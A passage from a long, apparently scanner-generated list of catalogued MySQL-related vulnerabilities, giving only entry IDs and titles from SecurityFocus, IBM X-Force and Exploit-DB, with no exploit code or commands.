19837| [37075] MySQL MyISAM Table Symbolic Link Local Privilege Escalation Vulnerability
19838| [36242] MySQL 5.x Unspecified Buffer Overflow Vulnerability
19839| [35858] MySQL Connector/J Unicode Character String SQL Injection Vulnerability
19840| [35609] MySQL 'sql_parse.cc' Multiple Format String Vulnerabilities
19841| [35514] MySQL Connector/Net SSL Certificate Validation Security Bypass Vulnerability
19842| [33972] MySQL XPath Expression Remote Denial Of Service Vulnerability
19843| [33392] 'mod_auth_mysql' Package Multibyte Character Encoding SQL Injection Vulnerability
19844| [32978] MySQL Calendar 'username' Parameter SQL Injection Vulnerability
19845| [32914] MySQL Calendar Cookie Authentication Bypass Vulnerability
19846| [32157] MySQL Quick Admin 'actions.php' Local File Include Vulnerability
19847| [32000] Agora 'MysqlfinderAdmin.php' Remote File Include Vulnerability
19848| [31517] MySQL Quick Admin 'index.php' Local File Include Vulnerability
19849| [31486] MySQL Command Line Client HTML Special Characters HTML Injection Vulnerability
19850| [31425] PromoteWeb MySQL 'go.php' SQL Injection Vulnerability
19851| [31081] MySQL Empty Binary String Literal Remote Denial Of Service Vulnerability
19852| [30835] mysql-lists Unspecified Cross Site Scripting Vulnerability
19853| [30529] Keld PHP-MySQL News Script 'login.php' SQL Injection Vulnerability
19854| [30383] phpwebnews-mysql Multiple SQL Injection Vulnerabilities
19855| [29106] MySQL MyISAM Table Privileges Secuity Bypass Vulnerability
19856| [29048] GEDCOM_to_MySQL2 Multiple Cross-Site Scripting Vulnerabilities
19857| [28351] MySQL INFORMATION_SCHEMA Remote Denial Of Service Vulnerability
19858| [27938] DSPAM Debian 'libdspam7-drv-mysql' Cron Job MySQL Calls Local Information Disclosure Vulnerability
19859| [27202] PHP Webquest MySQL Credentials Information Disclosure Vulnerability
19860| [27032] PHP MySQL Open Source Help Desk 'form.php' Code Injection Vulnerability
19861| [26947] MySQL Server Unspecified Remote Arbitrary Command Execution Vulnerability
19862| [26832] MySQL Server Privilege Escalation And Denial Of Service Vulnerabilities
19863| [26829] aurora framework Db_mysql.LIB SQL Injection Vulnerability
19864| [26765] MySQL Server RENAME TABLE System Table Overwrite Vulnerability
19865| [26353] MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
19866| [26304] AdventNet EventLog Analyzer Insecure Default MySQL Password Unauthorized Access Vulnerability
19867| [26156] Bacula MySQL Password Information Disclosure Vulnerability
19868| [26095] Asterisk 'asterisk-addons' CDR_ADDON_MYSQL Module SQL Injection Vulnerability
19869| [25017] MySQL Access Validation and Denial of Service Vulnerabilities
19870| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
19871| [24016] MySQL Rename Table Function Access Validation Vulnerability
19872| [24011] MySQL Security Invoker Privilege Escalation Vulnerability
19873| [24008] MySQL Alter Table Function Information Disclosure Vulnerability
19874| [23911] MySQL IF Query Handling Remote Denial Of Service Vulnerability
19875| [23176] Eve-Nuke Forums MySQL.PHP Remote File Include Vulnerability
19876| [22941] MySQL Commander Remote File Include Vulnerability
19877| [22900] MySQL Single Row SubSelect Remote Denial Of Service Vulnerability
19878| [22474] CPanel PassWDMySQL Cross-Site Scripting Vulnerability
19879| [22431] MySQLNewsEngine Affichearticles.PHP3 Remote File Include Vulnerability
19880| [20460] MySQLDumper SQL.PHP Cross-Site Scripting Vulnerability
19881| [20222] PABugs Class.MySQL.PHP Remote File Include Vulnerability
19882| [20165] ZoomStats MySQL.PHP Remote File Include Vulnerability
19883| [19794] MySQL Multiupdate and Subselects Denial Of Service Vulnerability
19884| [19559] MySQL Privilege Elevation and Security Bypass Vulnerabilities
19885| [19279] MySQL MERGE Privilege Revoke Bypass Vulnerability
19886| [19240] Banex PHP MySQL Banner Exchange Multiple Remote Vulnerabilities
19887| [19032] MySQL Server Date_Format Denial Of Service Vulnerability
19888| [18717] PHP/MySQL Classifieds AddAsset1.PHP Multiple HTML Injection Vulnerabilities
19889| [18439] MySQL Server Str_To_Date Remote Denial Of Service Vulnerability
19890| [18219] MySQL Mysql_real_escape Function SQL Injection Vulnerability
19891| [17780] MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities
19892| [17224] Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability
19893| [17223] Cholod MySQL Based Message Board Multiple HTML Injection Vulnerabilities
19894| [17147] Woltlab Burning Board Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability
19895| [16850] MySQL Query Logging Bypass Vulnerability
19896| [16620] PHP/MYSQL Timesheet Multiple SQL Injection Vulnerabilities
19897| [16564] PAM-MySQL Code Execution And Denial Of Service Vulnerabilities
19898| [16219] PHP MySQLI Error Logging Remote Format String Vulnerability
19899| [16145] PHP MySQL_Connect Remote Buffer Overflow Vulnerability
19900| [15852] MySQL Auction Search Module Cross-Site Scripting Vulnerability
19901| [14509] MySQL User-Defined Function Buffer Overflow Vulnerability
19902| [14437] MySQL Eventum Multiple SQL Injection Vulnerabilities
19903| [14436] MySQL Eventum Multiple Cross-Site Scripting Vulnerabilities
19904| [13913] xMySQLadmin Insecure Temporary File Creation Vulnerability
19905| [13660] MySQL mysql_install_db Insecure Temporary File Creation Vulnerability
19906| [13378] MySQL MaxDB WebDAV IF Parameter Remote Buffer Overflow Vulnerability
19907| [13369] MySQL MaxDB WebDAV Lock Token Remote Buffer Overflow Vulnerability
19908| [13368] MySQL MaxDB HTTP GET Request Remote Buffer Overflow Vulnerability
19909| [12805] MySQL MaxDB WebAgent Input Validation Multiple Remote Denial Of Service Vulnerabilities
19910| [12781] MySQL AB MySQL Multiple Remote Vulnerabilities
19911| [12313] MySQL MaxDB WebAgent Remote Denial of Service Vulnerabilities
19912| [12277] MySQL Database MySQLAccess Local Insecure Temporary File Creation Vulnerability
19913| [12265] MySQL MaxDB WebAgent WebSQL Password Parameter Remote Buffer Overflow Vulnerability
19914| [12133] MySQL Eventum Multiple Input Validation Vulnerabilities
19915| [11844] MySQL MaxDB WebDav Handler Overwrite Header Remote Buffer Overflow Vulnerability
19916| [11843] MySQL MaxDB WAHTTP Server Remote Denial Of Service Vulnerability
19917| [11435] MySQL Database Unauthorized GRANT Privilege Vulnerability
19918| [11432] MySQL Remote FULLTEXT Search Denial Of Service Vulnerability
19919| [11357] MySQL Multiple Local Vulnerabilities
19920| [11346] MySQL MaxDB WebDBM Server Name Denial of Service Vulnerability
19921| [11291] MySQL Unspecified Insecure Temporary File Creation Vulnerability
19922| [11261] MySQL Bounded Parameter Statement Execution Remote Buffer Overflow Vulnerability
19923| [11234] AllWebScripts MySQLGuest HTML Injection Vulnerability
19924| [10986] Ben Yacoub Hatem MySQL Backup Pro Undisclosed 'getbackup()' Vulnerability
19925| [10981] MySQL Mysql_real_connect Function Potential Remote Buffer Overflow Vulnerability
19926| [10969] MySQL Mysqlhotcopy Script Insecure Temporary File Creation Vulnerability
19927| [10655] MySQL Password Length Remote Buffer Overflow Vulnerability
19928| [10654] MySQL Authentication Bypass Vulnerability
19929| [10142] MySQL MYSQLD_Multi Insecure Temporary File Creation Vulnerability
19930| [9976] MySQL Aborted Bug Report Insecure Temporary File Creation Vulnerability
19931| [8796] MySQL Multiple Vulnerabilities
19932| [8590] MySQL Password Handler Buffer Overflow Vulnerability
19933| [8245] MySQL AB ODBC Driver Plain Text Password Vulnerability
19934| [7887] MySQL libmysqlclient Library mysql_real_connect() Buffer Overrun Vulnerability
19935| [7500] MySQL Weak Password Encryption Vulnerability
19936| [7052] MySQL mysqld Privilege Escalation Vulnerability
19937| [7041] MySQL Control Center Insecure Default File Permission Vulnerability
19938| [6718] MySQL Double Free Heap Corruption Vulnerability
19939| [6375] MySQL COM_CHANGE_USER Password Memory Corruption Vulnerability
19940| [6374] MySQL libmysqlclient Library Read_One_Row Buffer Overflow Vulnerability
19941| [6373] MySQL COM_CHANGE_USER Password Length Account Compromise Vulnerability
19942| [6370] MySQL libmysqlclient Library Read_Rows Buffer Overflow Vulnerability
19943| [6368] MySQL COM_TABLE_DUMP Memory Corruption Vulnerability
19944| [5948] PHPRank MySQL Error Unauthorized Access Vulnerability
19945| [5853] MySQL DataDir Parameter Local Buffer Overflow Vulnerability
19946| [5513] MySQL Logging Not Enabled Weak Default Configuration Vulnerability
19947| [5511] MySQL Bind Address Not Enabled Weak Default Configuration Vulnerability
19948| [5503] MySQL Null Root Password Weak Default Configuration Vulnerability
19949| [4409] Cyrus SASL LDAP+MySQL Authentication Patch SQL Command Execution Vulnerability
19950| [4026] PHP MySQL Safe_Mode Filesystem Circumvention Vulnerability
19951| [3907] Conectiva Linux MySQL World Readable Log File Vulnerability
19952| [3381] WinMySQLadmin Plain Text Password Storage Vulnerability
19953| [3284] Inter7 vpopmail MySQL Authentication Data Recovery Vulnerability
19954| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
19955| [2522] MySQL Root Operation Symbolic Link File Overwriting Vulnerability
19956| [2380] MySQL SHOW GRANTS Pasword Hash Disclosure Vulnerability
19957| [2262] Mysql Local Buffer Overflow Vulnerability
19958| [1850] pam_mysql Authentication Input Validation Vulnerability
19959| [1826] MySQL Authentication Algorithm Vulnerability
19960| [1557] PCCS Mysql Database Admin Tool Username/Password Exposure Vulnerability
19961| [975] MySQL Unauthenticated Remote Access Vulnerability
19962| [926] MySQL GRANT Global Password Changing Vulnerability
19963|
19964| IBM X-Force - https://exchange.xforce.ibmcloud.com:
19965| [85724] Oracle MySQL Server XA Transactions denial of service
19966| [85723] Oracle MySQL Server Server Replication denial of service
19967| [85722] Oracle MySQL Server InnoDB denial of service
19968| [85721] Oracle MySQL Server Server Privileges unspecified
19969| [85720] Oracle MySQL Server Server Partition denial of service
19970| [85719] Oracle MySQL Server Server Parser denial of service
19971| [85718] Oracle MySQL Server Server Options denial of service
19972| [85717] Oracle MySQL Server Server Options denial of service
19973| [85716] Oracle MySQL Server Server Optimizer denial of service
19974| [85715] Oracle MySQL Server Server Optimizer denial of service
19975| [85714] Oracle MySQL Server Prepared Statements denial of service
19976| [85713] Oracle MySQL Server InnoDB denial of service
19977| [85712] Oracle MySQL Server Full Text Search denial of service
19978| [85711] Oracle MySQL Server Data Manipulation Language denial of service
19979| [85710] Oracle MySQL Server Data Manipulation Language denial of service
19980| [85709] Oracle MySQL Server Audit Log unspecified
19981| [85708] Oracle MySQL Server MemCached unspecified
19982| [84846] Debian mysql-server package information disclosure
19983| [84375] Wireshark MySQL dissector denial of service
19984| [83554] Oracle MySQL Server Server Partition denial of service
19985| [83553] Oracle MySQL Server Server Locking denial of service
19986| [83552] Oracle MySQL Server Server Install unspecified
19987| [83551] Oracle MySQL Server Server Types denial of service
19988| [83550] Oracle MySQL Server Server Privileges unspecified
19989| [83549] Oracle MySQL Server InnoDB denial of service
19990| [83548] Oracle MySQL Server InnoDB denial of service
19991| [83547] Oracle MySQL Server Data Manipulation Language denial of service
19992| [83546] Oracle MySQL Server Stored Procedure denial of service
19993| [83545] Oracle MySQL Server Server Replication denial of service
19994| [83544] Oracle MySQL Server Server Partition denial of service
19995| [83543] Oracle MySQL Server Server Optimizer denial of service
19996| [83542] Oracle MySQL Server InnoDB denial of service
19997| [83541] Oracle MySQL Server Information Schema denial of service
19998| [83540] Oracle MySQL Server Data Manipulation Language denial of service
19999| [83539] Oracle MySQL Server Data Manipulation Language denial of service
20000| [83538] Oracle MySQL Server Server Optimizer unspecified
20001| [83537] Oracle MySQL Server MemCached denial of service
20002| [83536] Oracle MySQL Server Server Privileges unspecified
20003| [83535] Oracle MySQL Server Server Privileges unspecified
20004| [83534] Oracle MySQL Server Server unspecified
20005| [83533] Oracle MySQL Server Information Schema unspecified
20006| [83532] Oracle MySQL Server Server Locking unspecified
20007| [83531] Oracle MySQL Server Data Manipulation Language denial of service
20008| [83388] MySQL administrative login attempt detected
20009| [82963] Mambo MySQL database information disclosure
20010| [82946] Oracle MySQL buffer overflow
20011| [82945] Oracle MySQL buffer overflow
20012| [82895] Oracle MySQL and MariaDB geometry queries denial of service
20013| [81577] MySQL2JSON extension for TYPO3 unspecified SQL injection
20014| [81325] Oracle MySQL Server Server Privileges denial of service
20015| [81324] Oracle MySQL Server Server Partition denial of service
20016| [81323] Oracle MySQL Server Server Optimizer denial of service
20017| [81322] Oracle MySQL Server Server Optimizer denial of service
20018| [81321] Oracle MySQL Server Server denial of service
20019| [81320] Oracle MySQL Server MyISAM denial of service
20020| [81319] Oracle MySQL Server InnoDB denial of service
20021| [81318] Oracle MySQL Server InnoDB denial of service
20022| [81317] Oracle MySQL Server Server Locking denial of service
20023| [81316] Oracle MySQL Server Server denial of service
20024| [81315] Oracle MySQL Server Server Replication unspecified
20025| [81314] Oracle MySQL Server Server Replication unspecified
20026| [81313] Oracle MySQL Server Stored Procedure denial of service
20027| [81312] Oracle MySQL Server Server Optimizer denial of service
20028| [81311] Oracle MySQL Server Information Schema denial of service
20029| [81310] Oracle MySQL Server GIS Extension denial of service
20030| [80790] Oracle MySQL yaSSL buffer overflow
20031| [80553] Oracle MySQL and MariaDB salt security bypass
20032| [80443] Oracle MySQL Server unspecified code execution
20033| [80442] Oracle MySQL Server acl_get() buffer overflow
20034| [80440] Oracle MySQL Server table buffer overflow
20035| [80435] Oracle MySQL Server database privilege escalation
20036| [80434] Oracle MySQL Server COM_BINLOG_DUMP denial of service
20037| [80433] Oracle MySQL Server Stuxnet privilege escalation
20038| [80432] Oracle MySQL Server authentication information disclosure
20039| [79394] Oracle MySQL Server Server Installation information disclosure
20040| [79393] Oracle MySQL Server Server Replication denial of service
20041| [79392] Oracle MySQL Server Server Full Text Search denial of service
20042| [79391] Oracle MySQL Server Server denial of service
20043| [79390] Oracle MySQL Server Client information disclosure
20044| [79389] Oracle MySQL Server Server Optimizer denial of service
20045| [79388] Oracle MySQL Server Server Optimizer denial of service
20046| [79387] Oracle MySQL Server Server denial of service
20047| [79386] Oracle MySQL Server InnoDB Plugin denial of service
20048| [79385] Oracle MySQL Server InnoDB denial of service
20049| [79384] Oracle MySQL Server Client unspecified
20050| [79383] Oracle MySQL Server Server denial of service
20051| [79382] Oracle MySQL Server Protocol unspecified
20052| [79381] Oracle MySQL Server Information Schema unspecified
20053| [78954] SilverStripe MySQLDatabase.php information disclosure
20054| [78948] MySQL MyISAM table symlink
20055| [77865] MySQL unknown vuln
20056| [77864] MySQL sort order denial of service
20057| [77768] MySQLDumper refresh_dblist.php information disclosure
20058| [77177] MySQL Squid Access Report unspecified cross-site scripting
20059| [77065] Oracle MySQL Server Optimizer denial of service
20060| [77064] Oracle MySQL Server Optimizer denial of service
20061| [77063] Oracle MySQL Server denial of service
20062| [77062] Oracle MySQL InnoDB denial of service
20063| [77061] Oracle MySQL GIS Extension denial of service
20064| [77060] Oracle MySQL Server Optimizer denial of service
20065| [76189] MySQL unspecified error
20066| [76188] MySQL attempts security bypass
20067| [75287] MySQLDumper restore.php information disclosure
20068| [75286] MySQLDumper filemanagement.php directory traversal
20069| [75285] MySQLDumper main.php cross-site request forgery
20070| [75284] MySQLDumper install.php cross-site scripting
20071| [75283] MySQLDumper install.php file include
20072| [75282] MySQLDumper menu.php code execution
20073| [75022] Oracle MySQL Server Server Optimizer denial of service
20074| [75021] Oracle MySQL Server Server Optimizer denial of service
20075| [75020] Oracle MySQL Server Server DML denial of service
20076| [75019] Oracle MySQL Server Partition denial of service
20077| [75018] Oracle MySQL Server MyISAM denial of service
20078| [75017] Oracle MySQL Server Server Optimizer denial of service
20079| [74672] Oracle MySQL Server multiple unspecified
20080| [73092] MySQL unspecified code execution
20081| [72540] Oracle MySQL Server denial of service
20082| [72539] Oracle MySQL Server unspecified
20083| [72538] Oracle MySQL Server denial of service
20084| [72537] Oracle MySQL Server denial of service
20085| [72536] Oracle MySQL Server unspecified
20086| [72535] Oracle MySQL Server denial of service
20087| [72534] Oracle MySQL Server denial of service
20088| [72533] Oracle MySQL Server denial of service
20089| [72532] Oracle MySQL Server denial of service
20090| [72531] Oracle MySQL Server denial of service
20091| [72530] Oracle MySQL Server denial of service
20092| [72529] Oracle MySQL Server denial of service
20093| [72528] Oracle MySQL Server denial of service
20094| [72527] Oracle MySQL Server denial of service
20095| [72526] Oracle MySQL Server denial of service
20096| [72525] Oracle MySQL Server information disclosure
20097| [72524] Oracle MySQL Server denial of service
20098| [72523] Oracle MySQL Server denial of service
20099| [72522] Oracle MySQL Server denial of service
20100| [72521] Oracle MySQL Server denial of service
20101| [72520] Oracle MySQL Server denial of service
20102| [72519] Oracle MySQL Server denial of service
20103| [72518] Oracle MySQL Server unspecified
20104| [72517] Oracle MySQL Server unspecified
20105| [72516] Oracle MySQL Server unspecified
20106| [72515] Oracle MySQL Server denial of service
20107| [72514] Oracle MySQL Server unspecified
20108| [71965] MySQL port denial of service
20109| [70680] DBD::mysqlPP unspecified SQL injection
20110| [70370] TaskFreak! multi-mysql unspecified path disclosure
20111| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
20112| [68294] MySQLDriverCS statement.cs sql injection
20113| [68175] Prosody MySQL denial of service
20114| [67539] Zend Framework MySQL PDO security bypass
20115| [67254] DirectAdmin MySQL information disclosure
20116| [66567] Xoops mysql.sql information disclosure
20117| [65871] PyWebDAV MySQLAuthHandler class SQL injection
20118| [65543] MySQL Select Arbitrary data into a File
20119| [65529] MySQL Eventum full_name field cross-site scripting
20120| [65380] Oracle MySQL Eventum forgot_password.php cross-site scripting
20121| [65379] Oracle MySQL Eventum list.php cross-site scripting
20122| [65266] Accellion File Transfer Appliance MySQL default password
20123| [64878] MySQL Geometry denial of service
20124| [64877] MySQL EXPLAIN EXTENDED denial of service
20125| [64876] MySQL prepared statement denial of service
20126| [64845] MySQL extreme-value denial of service
20127| [64844] MySQL Gis_line_string::init_from_wkb denial of service
20128| [64843] MySQL user-variable denial of service
20129| [64842] MySQL view preparation denial of service
20130| [64841] MySQL prepared statement denial of service
20131| [64840] MySQL LONGBLOB denial of service
20132| [64839] MySQL invocations denial of service
20133| [64838] MySQL Gis_line_string::init_from_wkb denial of service
20134| [64689] MySQL dict0crea.c denial of service
20135| [64688] MySQL SET column denial of service
20136| [64687] MySQL BINLOG command denial of service
20137| [64686] MySQL InnoDB denial of service
20138| [64685] MySQL HANDLER interface denial of service
20139| [64684] MySQL Item_singlerow_subselect::store denial of service
20140| [64683] MySQL OK packet denial of service
20141| [63518] MySQL Query Browser GUI Tools information disclosure
20142| [63517] MySQL Administrator GUI Tools information disclosure
20143| [62272] MySQL PolyFromWKB() denial of service
20144| [62269] MySQL LIKE predicates denial of service
20145| [62268] MySQL joins denial of service
20146| [62267] MySQL GREATEST() or LEAST() denial of service
20147| [62266] MySQL GROUP_CONCAT() denial of service
20148| [62265] MySQL expression values denial of service
20149| [62264] MySQL temporary table denial of service
20150| [62263] MySQL LEAST() or GREATEST() denial of service
20151| [62262] MySQL replication privilege escalation
20152| [61739] MySQL WITH ROLLUP denial of service
20153| [61343] MySQL LOAD DATA INFILE denial of service
20154| [61342] MySQL EXPLAIN denial of service
20155| [61341] MySQL HANDLER denial of service
20156| [61340] MySQL BINLOG denial of service
20157| [61339] MySQL IN() or CASE denial of service
20158| [61338] MySQL SET denial of service
20159| [61337] MySQL DDL denial of service
20160| [61318] PHP mysqlnd_wireprotocol.c buffer overflow
20161| [61317] PHP php_mysqlnd_read_error_from_line buffer overflow
20162| [61316] PHP php_mysqlnd_auth_write buffer overflow
20163| [61274] MySQL TEMPORARY InnoDB denial of service
20164| [59905] MySQL ALTER DATABASE denial of service
20165| [59841] CMySQLite updateUser.php cross-site request forgery
20166| [59112] MySQL Enterprise Monitor unspecified cross-site request forgery
20167| [59075] PHP php_mysqlnd_auth_write() buffer overflow
20168| [59074] PHP php_mysqlnd_read_error_from_line() buffer overflow
20169| [59073] PHP php_mysqlnd_rset_header_read() buffer overflow
20170| [59072] PHP php_mysqlnd_ok_read() information disclosure
20171| [58842] MySQL DROP TABLE file deletion
20172| [58676] Template Shares MySQL information disclosure
20173| [58531] MySQL COM_FIELD_LIST buffer overflow
20174| [58530] MySQL packet denial of service
20175| [58529] MySQL COM_FIELD_LIST security bypass
20176| [58311] ClanSphere the captcha generator and MySQL driver SQL injection
20177| [57925] MySQL UNINSTALL PLUGIN security bypass
20178| [57006] Quicksilver Forums mysqldump information disclosure
20179| [56800] Employee Timeclock Software mysqldump information disclosure
20180| [56200] Flex MySQL Connector ActionScript SQL injection
20181| [55877] MySQL yaSSL buffer overflow
20182| [55622] kiddog_mysqldumper extension for TYPO3 information disclosure
20183| [55416] MySQL unspecified buffer overflow
20184| [55382] Ublog UblogMySQL.sql information disclosure
20185| [55251] PHP-MySQL-Quiz editquiz.php SQL injection
20186| [54597] MySQL sql_table.cc security bypass
20187| [54596] MySQL mysqld denial of service
20188| [54365] MySQL OpenSSL security bypass
20189| [54364] MySQL MyISAM table symlink
20190| [53950] The mysql-ocaml mysql_real_escape_string weak security
20191| [52978] Zmanda Recovery Manager for MySQL mysqlhotcopy privilege escalation
20192| [52977] Zmanda Recovery Manager for MySQL socket-server.pl command execution
20193| [52660] iScouter PHP Web Portal MySQL Password Retrieval
20194| [52220] aa33code mysql.inc information disclosure
20195| [52122] MySQL Connector/J unicode SQL injection
20196| [51614] MySQL dispatch_command() denial of service
20197| [51406] MySQL Connector/NET SSL spoofing
20198| [49202] MySQL UDF command execution
20199| [49050] MySQL XPath denial of service
20200| [48919] Cisco Application Networking Manager MySQL default account password
20201| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
20202| [47544] MySQL Calendar index.php SQL injection
20203| [47476] MySQL Calendar index.php nodstrumCalendarV2 security bypass
20204| [45649] MySQL MyISAM symlink security bypass
20205| [45648] MySQL MyISAM symlinks security bypass
20206| [45607] MySQL Quick Admin actions.php file include
20207| [45606] MySQL Quick Admin index.php file include
20208| [45590] MySQL command-line client cross-site scripting
20209| [45436] PromoteWeb MySQL go.php SQL injection
20210| [45042] MySQL empty bit-string literal denial of service
20211| [44662] mysql-lists unspecified cross-site scripting
20212| [42267] MySQL MyISAM security bypass
20213| [42211] GEDCOM_to_MySQL2 index.php, info.php and prenom.php cross-site scripting
20214| [42014] miniBB setup_mysql.php and setup_options.php SQL injection
20215| [40920] MySQL sql_select.cc denial of service
20216| [40734] MySQL Server BINLOG privilege escalation
20217| [40350] MySQL password information disclosure
20218| [39415] Debian GNU/Linux libdspam7-drv-mysql cron job password disclosure
20219| [39402] PHP LOCAL INFILE and MySQL extension security bypass
20220| [38999] aurora framework db_mysql.lib SQL injection
20221| [38990] MySQL federated engine denial of service
20222| [38989] MySQL DEFINER value privilege escalation
20223| [38988] MySQL DATA DIRECTORY and INDEX DIRECTORY privilege escalation
20224| [38964] MySQL RENAME TABLE symlink
20225| [38733] ManageEngine EventLog Analyzer MySQL default password
20226| [38284] MySQL ha_innodb.cc convert_search_mode_to_innobase() denial of service
20227| [38189] MySQL default root password
20228| [37235] Asterisk-Addons cdr_addon_mysql module SQL injection
20229| [37099] RHSA update for MySQL case sensistive database name privilege escalation not installed
20230| [36555] PHP MySQL extension multiple functions security bypass
20231| [35960] MySQL view privilege escalation
20232| [35959] MySQL CREATE TABLE LIKE information disclosure
20233| [35958] MySQL connection protocol denial of service
20234| [35291] MySQLDumper main.php security bypass
20235| [34811] MySQL udf_init and mysql_create_function command execution
20236| [34809] MySQL mysql_update privilege escalation
20237| [34349] MySQL ALTER information disclosure
20238| [34348] MySQL mysql_change_db privilege escalation
20239| [34347] MySQL RENAME TABLE weak security
20240| [34232] MySQL IF clause denial of service
20241| [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
20242| [33285] Eve-Nuke mysql.php file include
20243| [32957] MySQL Commander dbopen.php file include
20244| [32933] cPanel load_language.php and mysqlconfig.php file include
20245| [32911] MySQL filesort function denial of service
20246| [32462] cPanel passwdmysql cross-site scripting
20247| [32288] RHSA-2006:0544 updates for mysql not installed
20248| [32266] MySQLNewsEngine affichearticles.php3 file include
20249| [31244] The Address Book MySQL export.php password information disclosure
20250| [31037] Php/Mysql Site Builder (PHPBuilder) htm2php.php directory traversal
20251| [30760] BTSaveMySql URL file disclosure
20252| [30191] StoryStream mysql.php and mysqli.php file include
20253| [30085] MySQL MS-DOS device name denial of service
20254| [30031] Agora MysqlfinderAdmin.php file include
20255| [29438] MySQLDumper mysqldumper_path/sql.php cross-site scripting
20256| [29179] paBugs class.mysql.php file include
20257| [29120] ZoomStats MySQL file include
20258| [28448] MySQL case sensitive database name privilege escalation
20259| [28442] MySQL GRANT EXECUTE privilege escalation
20260| [28387] FunkBoard admin/mysql_install.php and admin/pg_install.php unauthorized access
20261| [28202] MySQL multiupdate subselect query denial of service
20262| [28180] MySQL MERGE table security bypass
20263| [28176] PHP MySQL Banner Exchange lib.inc information disclosure
20264| [27995] Opsware Network Automation System MySQL plaintext password
20265| [27904] MySQL date_format() format string
20266| [27635] MySQL Instance Manager denial of service
20267| [27212] MySQL SELECT str_to_date denial of service
20268| [26875] MySQL ASCII escaping SQL injection
20269| [26420] Apple Mac OS X MySQL Manager blank password
20270| [26236] MySQL login packet information disclosure
20271| [26232] MySQL COM_TABLE_DUMP buffer overflow
20272| [26228] MySQL sql_parce.cc information disclosure
20273| [26042] MySQL running
20274| [25313] WoltLab Burning Board class_db_mysql.php cross-site scripting
20275| [24966] MySQL mysql_real_query logging bypass
20276| [24653] PAM-MySQL logging function denial of service
20277| [24652] PAM-MySQL authentication double free code execution
20278| [24567] PHP/MYSQL Timesheet index.php and changehrs.php SQL injection
20279| [24095] PHP ext/mysqli exception handling format string
20280| [23990] PHP mysql_connect() buffer overflow
20281| [23596] MySQL Auction search module could allow cross-site scripting
20282| [22642] RHSA-2005:334 updates for mysql not installed
20283| [21757] MySQL UDF library functions command execution
20284| [21756] MySQL LoadLibraryEx function denial of service
20285| [21738] MySQL UDF mysql_create_function function directory traversal
20286| [21737] MySQL user defined function buffer overflow
20287| [21640] MySQL Eventum multiple class SQL injection
20288| [21638] MySQL Eventum multiple scripts cross-site scripting
20289| [20984] xmysqladmin temporary file symlink
20290| [20656] MySQL mysql_install_db script symlink
20291| [20333] Plans MySQL password information disclosure
20292| [19659] MySQL CREATE TEMPORARY TABLE command creates insecure files
20293| [19658] MySQL udf_init function gain access
20294| [19576] auraCMS mysql_fetch_row function path disclosure
20295| [18922] MySQL mysqlaccess script symlink attack
20296| [18824] MySQL UDF root privileges
20297| [18464] mysql_auth unspecified vulnerability
20298| [18449] Sugar Sales plaintext MySQL password
20299| [17783] MySQL underscore allows elevated privileges
20300| [17768] MySQL MATCH ... AGAINST SQL statement denial of service
20301| [17667] MySQL UNION change denial of service
20302| [17666] MySQL ALTER TABLE RENAME bypass restriction
20303| [17493] MySQL libmysqlclient bulk inserts buffer overflow
20304| [17462] MySQLGuest AWSguest.php script cross-site scripting
20305| [17047] MySQL mysql_real_connect buffer overflow
20306| [17030] MySQL mysqlhotcopy insecure temporary file
20307| [16612] MySQL my_rnd buffer overflow
20308| [16604] MySQL check_scramble_323 function allows unauthorized access
20309| [15883] MySQL mysqld_multi script symlink attack
20310| [15617] MySQL mysqlbug script symlink attack
20311| [15417] Confixx db_mysql_loeschen2.php SQL injection
20312| [15280] Proofpoint Protection Server MySQL allows unauthorized access
20313| [13404] HP Servicecontrol Manager multiple vulnerabilities in MySQL could allow execution of code
20314| [13153] MySQL long password buffer overflow
20315| [12689] MySQL AB ODBC Driver stores ODBC passwords and usernames in plain text
20316| [12540] Teapop PostSQL and MySQL modules SQL injection
20317| [12337] MySQL mysql_real_connect function buffer overflow
20318| [11510] MySQL datadir/my.cnf modification could allow root privileges
20319| [11493] mysqlcc configuration and connection files are world writable
20320| [11340] SuckBot mod_mysql_logger denial of service
20321| [11199] MySQL mysql_change_user() double-free memory pointer denial of service
20322| [10850] MySQL libmysql client read_one_row buffer overflow
20323| [10849] MySQL libmysql client read_rows buffer overflow
20324| [10848] MySQL COM_CHANGE_USER password buffer overflow
20325| [10847] MySQL COM_CHANGE_USER command password authentication bypass
20326| [10846] MySQL COM_TABLE_DUMP unsigned integer denial of service
20327| [10483] Bugzilla stores passwords in plain text in the MySQL database
20328| [10455] gBook MySQL could allow administrative access
20329| [10243] MySQL my.ini "
20330| [9996] MySQL SHOW GRANTS command discloses adminstrator`s encrypted password
20331| [9909] MySQL logging disabled by default on Windows
20332| [9908] MySQL binding to the loopback adapter is disabled
20333| [9902] MySQL default root password could allow unauthorized access
20334| [8748] Cyrus SASL LDAP+MySQL patch allows user unauthorized POP access
20335| [8105] PHP MySQL client library allows an attacker to bypass safe_mode restrictions
20336| [7923] Conectiva Linux MySQL /var/log/mysql file has insecure permissions
20337| [7206] WinMySQLadmin stores MySQL password in plain text
20338| [6617] MySQL "
20339| [6419] MySQL drop database command buffer overflow
20340| [6418] MySQL libmysqlclient.so buffer overflow
20341| [5969] MySQL select buffer overflow
20342| [5447] pam_mysql authentication input
20343| [5409] MySQL authentication algorithm obtain password hash
20344| [5057] PCCS MySQL Database Admin Tool could reveal username and password
20345| [4228] MySQL unauthenticated remote access
20346| [3849] MySQL default test account could allow any user to connect to the database
20347| [1568] MySQL creates readable log files
20348|
20349| Exploit-DB - https://www.exploit-db.com:
20350| [30744] MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
20351| [30677] Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module SQL Injection Vulnerability
20352| [30020] MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability
20353| [29724] MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability
20354| [29653] Active Calendar 1.2 data/mysqlevents.php css Parameter XSS
20355| [29572] CPanel <= 11 PassWDMySQL Cross-Site Scripting Vulnerability
